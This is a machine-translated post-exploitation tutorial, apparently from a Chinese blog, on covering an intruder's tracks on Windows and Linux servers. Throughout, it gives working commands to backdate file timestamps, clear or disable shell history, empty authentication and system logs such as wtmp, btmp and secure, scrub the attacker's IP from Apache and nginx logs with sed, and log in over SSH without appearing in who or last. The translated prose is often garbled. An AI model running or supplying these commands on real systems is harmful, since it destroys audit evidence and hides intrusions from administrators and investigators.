Penetration test - post penetration - Trace cleaning

https://mp.weixin.qq.com/s/bc2zKlsQSTMPVMPfQyrXSA  Post penetration - Trace cleaning 


Windows

 Modify file timestamp 
 Log in to the server , Of it ⽂ Piece has been modified , The modified ⽂ The timestamp of the file will be updated to the latest time , Then this will attract the attention of the Administrator .
 that ⽂ Change the time stamp of the document to another time .

Powershell Modify time command 
$(DATE)  Represents the current date and time ;

$(Get-Date)  Same as $(DATE), Represents the current date and time ;

$(Get-Date "MM/DD/YYYY HH24:MI:SS")  Indicates the specified date and time ;

$(Get-Item abc.txt)  Represents the handle to get the file ;

$(Get-Item abc.txt).creationtime  Get file creation time 

$(Get-Item abc.txt).lastaccesstime  Get the last access time of the file 

$(Get-Item abc.txt).lastwritetime  Get file modification time 



#  Settings file test.txt The time of is the current time 

$(Get-Item abc.txt).creationtime=$(DATE)

$(Get-Item abc.txt).lastaccesstime=$(DATE)

$(Get-Item abc.txt).lastwritetime=$(DATE)



#  Settings file abc.txt The time of is a specified time 

$(Get-Item abc.txt).creationtime=$(Get-Date "11/04/2019 20:42:23")

$(Get-Item abc.txt).lastaccesstime=$(Get-Date "11/04/2019 20:42:23")

$(Get-Item abc.txt).lastwritetime=$(Get-Date "11/04/2019 20:42:23")

 Modify file timestamp 

$data="10/1/2008 12:30:30";$file="C:\test.txt";$(Get-Item $file).creationtime=$(Get-Date $data);$(Get-Item $file).lastaccesstime=$(Get-Date $data);$(Get-Item $file).lastwritetime=$(Get-Date $data)





Linux

 Modify file timestamp 
ls -l test.txt

#  Modify the modification time and access time of the file 
touch -d "2018-04-18 08:00:00" test.txt

 eliminate history Historical command record 
bash When you execute a command, you don't write the command name immediately history Of documents ,
 It's stored inside buffer in , etc. bash It will be written when exiting .
 however , You can call history -w An order requires bash Update immediately history file .

history   #  View historical operation commands 

cat  ~/.bash_history   # history Log files 

 The first way ：

 edit history Log files , Delete some history commands that you don't want to save .

vim ~/.bash_history

 Clear the current user's history Command record   
history -c


 The second way ：

 utilize vim Carry out orders  

 Use vim Open a file 
vi test.txt
 Set up vim Do not record command ,Vim Will record the command history , Save in viminfo In file .

:set history=0
:!command

 The third way ：

 By modifying the profile /etc/profile, Make the system no longer Save command records . By default, historical commands are saved 1000 strip , You can change the value to 0, Then save and exit , Finally, restart the system to make the configuration file take effect .
HISTSIZE=0

 The fourth way ：

 After logging in, execute the following command , Don't record historical commands (.bash_history)
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0


 Clear system log traces 
Linux  There are many kinds of log files in the system , To record the log generated during the operation of the system . 

/var/log/btmp    Record all login failure information , Use lastb Command view 

/var/log/lastlog  Log the last login time of all users in the system , Use lastlog Command view 

/var/log/wtmp     Log in of all users 、 Cancellation information , Use last Command view 

/var/log/utmp     Record the currently logged in user information , Use w,who,users Wait for the order to check 

/var/log/secure    Record security related log information 

/var/log/message   Record information and error log after system startup 



 The first way ： Empty log file 

l Clear the record of login failure ： 

echo > /var/log/btmp

lastb

 Clear the record of successful login to the system ： 

echo > /var/log/wtmp 

last              // The information of successful login cannot be queried 


 Clear relevant log information ： 

 Clear the last login time of the user ：echo > /var/log/lastlog  #lastlog command 

 Clear the information of the currently logged in user ：echo >   /var/log/utmp   # Use w,who,users Wait for the order 

 Clear security log records ：cat /dev/null >  /var/log/secure

 Clear system logging ：cat /dev/null >  /var/log/message




 The second way ： Delete / Replace some logs 

 All log files are emptied , It's too easy to be noticed by the Administrator , If you just delete or replace some key log information , Then you can perfectly hide the traces of attack . 

#  Delete all lines that match the string , For example, by the date of the day or your own login ip

sed  -i '/ Their own ip/'d  test.txt

sed  -i '/192.168.1.2/'d test.txt

#  Global replacement login IP Address ：

sed 's/ String to be replaced / New string /g'

sed -i 's/192.168.1.1/192.168.1.2/g' test.txt







 Hide remote SSH Log in records 
 Stealth login system , It won't be w、who、last Wait for command to detect . 

ssh -T [email protected]192.168.0.1 /bin/bash -i

 Don't record ssh The public key is local .ssh Directory  

ssh -o UserKnownHostsFile=/dev/null -T [email protected] /bin/bash –i

 eliminate Web Traces of invasion 
 Direct replacement log ip Address  
sed -i 's/192.168.166.85/192.168.1.1/g' apache/logs/access.log

 Common log addresses 

# apache

apache/logs/access.log   #  Access log 

apache/logs/error.log   #  Error log 

# nginx

nginx/logs/access.log   #  Access log 

nginx/logs/error.log   #  Error log 

# tomcat

tomcat/logs/localhost_access_log. date .txt   #  Request log 

tomcat/logs/catalina. date .log   #  start log 

tomcat/logs/localhost. date .txt   #  Local logs 

tomcat/logs/host-manager. date .log   # manager Manage logs 

tomcat/logs/manager. journal .log   # manager Proprietary log 




Linux Delete login log and operation information 

echo > /var/log/wtmp // Clear user login records 

echo > /var/log/btmp // Clear log on attempts  echo>/var/log/lastlog // Clear recent login information 

echo > /var/log/secure // login information 

echo > /var/log/messages echo>/var/log/syslog // A service for recording system logs 

echo>/var/log/xferlog

echo>/var/log/auth.log

echo>/var/log/user.log

cat /dev/null > /var/adm/sylog

cat /dev/null > /var/log/maillog

cat /dev/null > /var/log/openwebmail.log

cat /dev/null > /var/log/mail.info echo>/var/run/utmp